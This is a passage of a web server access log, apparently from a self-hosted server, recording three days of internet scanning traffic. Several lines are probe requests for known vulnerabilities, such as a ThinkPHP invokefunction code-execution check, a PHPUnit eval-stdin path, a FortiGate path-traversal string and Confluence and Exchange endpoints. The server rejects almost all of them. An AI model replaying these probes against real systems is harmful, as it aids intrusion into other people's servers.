+0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:21:37:55 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:21:37:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:21:37:58 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:21:58:21 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 61.135.15.165] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4472.114 Mobile Safari/537.36" "-" [07/Sep/2021:22:38:16 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.220.136] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Sep/2021:22:54:19 +0000] 444 - GET https 64.22.31.253 "/login" [Client 192.241.215.95] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Sep/2021:23:19:28 +0000] 400 - GET http localhost "/recordings/theme/main.css" [Client 77.247.108.81] [Length 154] [Gzip -] "gbrmss/7.29.0" "-" [07/Sep/2021:23:31:23 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.221.7] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Sep/2021:23:44:49 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.215.223] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Sep/2021:23:55:03 +0000] 444 - GET https 64.22.31.253 "/Telerik.Web.UI.WebResource.axd?type=rau" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Sep/2021:00:42:55 +0000] 400 - - http localhost "-" [Client 91.220.163.62] [Length 154] [Gzip -] "-" "-" [08/Sep/2021:02:12:43 +0000] 444 - GET https 64.22.31.253 "/remote/login" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Sep/2021:02:21:37 +0000] 444 - GET https localhost "/" [Client 34.141.33.101] [Length 0] [Gzip -] "-" "-" [08/Sep/2021:02:21:38 +0000] 444 - OPTIONS https localhost "/" [Client 34.141.33.101] [Length 0] [Gzip -] "-" "-" [08/Sep/2021:02:21:38 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 34.141.33.101] [Length 0] [Gzip -] "-" "-" [08/Sep/2021:02:21:39 +0000] 400 - - https localhost "-" [Client 34.141.33.101] [Length 154] [Gzip -] "-" "-" [08/Sep/2021:02:21:44 +0000] 400 - - https localhost "-" [Client 34.141.33.101] [Length 0] [Gzip -] "-" "-" [08/Sep/2021:02:21:45 +0000] 400 - - https localhost "-" [Client 34.141.33.101] [Length 154] [Gzip -] "-" "-" [08/Sep/2021:02:21:45 +0000] 400 - - https localhost "-" [Client 34.141.33.101] [Length 154] [Gzip -] "-" "-" [08/Sep/2021:02:21:46 +0000] 400 - - https localhost "-" [Client 34.141.33.101] [Length 154] [Gzip -] "-" "-" [08/Sep/2021:02:21:46 +0000] 400 - - https localhost "-" [Client 34.141.33.101] [Length 154] [Gzip -] "-" "-" [08/Sep/2021:02:21:47 +0000] 400 - - https localhost "-" [Client 34.141.33.101] [Length 154] [Gzip -] "-" "-" [08/Sep/2021:02:54:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 216.218.206.69] [Length 0] [Gzip -] "-" "-" [08/Sep/2021:03:32:41 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 91.132.58.162] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.41.1.el7.x86_64" "-" [08/Sep/2021:05:47:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [08/Sep/2021:06:28:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.214.18] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Sep/2021:07:30:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Sep/2021:08:18:32 +0000] 444 - POST https 64.22.31.253 "/pages/createpage-entervariables.action?SpaceKey=x" [Client 217.182.219.181] [Length 0] [Gzip -] "python-requests/2.18.4" "-" [08/Sep/2021:09:00:00 +0000] 400 - GET https localhost "/4bsS" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [08/Sep/2021:09:41:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Sep/2021:10:04:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.154.255.147] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [08/Sep/2021:10:04:50 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 185.220.100.240] [Length 0] [Gzip -] "-" "-" [08/Sep/2021:10:04:55 +0000] 444 - OPTIONS https localhost "/" [Client 185.220.100.240] [Length 0] [Gzip -] "-" "-" [08/Sep/2021:10:04:57 +0000] 400 - - https localhost "-" [Client 185.220.101.130] [Length 154] [Gzip -] "-" "-" [08/Sep/2021:11:55:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 147.139.170.102] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [08/Sep/2021:11:56:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 147.139.170.102] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [08/Sep/2021:11:56:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 147.139.170.102] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [08/Sep/2021:11:57:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 147.139.170.102] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [08/Sep/2021:12:05:46 +0000] 444 - POST https 64.22.31.253 "/pages/createpage-entervariables.action?SpaceKey=x" [Client 138.68.161.204] [Length 0] [Gzip -] "python-requests/2.18.4" "-" [08/Sep/2021:12:13:15 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.220.87] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Sep/2021:14:39:49 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Sep/2021:14:39:52 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Sep/2021:14:39:52 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Sep/2021:14:39:53 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [08/Sep/2021:14:39:55 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Sep/2021:14:39:55 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Sep/2021:14:39:57 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Sep/2021:14:39:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Sep/2021:14:39:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Sep/2021:14:40:00 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Sep/2021:14:40:00 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Sep/2021:14:40:00 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Sep/2021:15:07:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 92.118.161.21] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [08/Sep/2021:16:09:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Sep/2021:22:25:05 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Sep/2021:22:25:05 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Sep/2021:22:25:05 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Sep/2021:22:25:05 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Sep/2021:22:25:05 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Sep/2021:22:25:05 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Sep/2021:23:31:09 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.207.227] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Sep/2021:00:02:55 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.212.72] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Sep/2021:01:56:16 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Sep/2021:01:56:17 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Sep/2021:03:31:22 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Sep/2021:03:31:23 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Sep/2021:04:40:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.43] [Length 0] [Gzip -] "-" "-" [09/Sep/2021:04:40:09 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.43] [Length 252] [Gzip -] "-" "-" [09/Sep/2021:04:40:09 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.43] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [09/Sep/2021:05:21:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 216.218.206.68] [Length 0] [Gzip -] "-" "-" [09/Sep/2021:05:51:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.79.68.246] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [09/Sep/2021:06:24:30 +0000] 444 - GET https 64.22.31.253 "/owa/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [09/Sep/2021:06:25:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.217.63] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Sep/2021:06:51:17 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Sep/2021:06:51:17 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Sep/2021:07:52:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [09/Sep/2021:08:12:38 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Sep/2021:08:12:38 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Sep/2021:08:15:59 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Sep/2021:08:16:00 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Sep/2021:09:11:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [09/Sep/2021:10:22:32 +0000] 444 - POST https 64.22.31.253 "/pages/createpage-entervariables.action?SpaceKey=x" [Client 138.68.161.204] [Length 0] [Gzip -] "python-requests/2.18.4" "-" [09/Sep/2021:12:16:21 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.220.78] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Sep/2021:12:53:30 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Sep/2021:12:53:31 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Sep/2021:12:53:32 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Sep/2021:12:53:34 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Sep/2021:12:53:36 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Sep/2021:12:53:36 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Sep/2021:12:53:36 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [09/Sep/2021:12:53:37 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Sep/2021:12:53:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Sep/2021:12:53:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Sep/2021:12:53:40 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Sep/2021:12:53:42 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Sep/2021:13:30:54 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Sep/2021:13:30:54 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Sep/2021:15:27:39 +0000] 400 - HEAD http localhost "/" [Client 161.35.206.220] [Length 0] [Gzip -] "-" "-" [09/Sep/2021:15:27:39 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 161.35.206.220] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [09/Sep/2021:15:27:40 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 161.35.206.220] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [09/Sep/2021:15:27:40 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 161.35.206.220] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [09/Sep/2021:15:27:40 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 161.35.206.220] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [09/Sep/2021:15:27:41 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 161.35.206.220] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [09/Sep/2021:15:27:41 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 161.35.206.220] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [09/Sep/2021:15:27:41 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 161.35.206.220] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [09/Sep/2021:15:27:42 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 161.35.206.220] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [09/Sep/2021:15:27:42 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 161.35.206.220] [Length 252] [Gzip -] "Roku/DVP-9.10 (289.10E04111A)" "-" [09/Sep/2021:15:27:42 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 161.35.206.220] [Length 0] [Gzip -] "Roku/DVP-9.10 (289.10E04111A)" "-" [09/Sep/2021:15:27:42 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 161.35.206.220] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [09/Sep/2021:15:27:43 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 161.35.206.220] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [09/Sep/2021:15:39:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 139.162.193.137] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [09/Sep/2021:15:44:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 182.161.66.103] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36" "-" [09/Sep/2021:17:05:42 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Sep/2021:17:05:42 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Sep/2021:17:30:16 +0000] 400 - GET http 64.22.31.253 "/" [Client 94.102.51.107] [Length 252] [Gzip -] "-" "-" [09/Sep/2021:18:41:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 139.162.193.245] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [09/Sep/2021:19:35:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 178.32.197.85] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0" "-" [09/Sep/2021:19:37:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [09/Sep/2021:19:43:50 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Sep/2021:19:57:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [09/Sep/2021:20:03:52 +0000] 444 - GET https smtp.moralanimal.net "/" 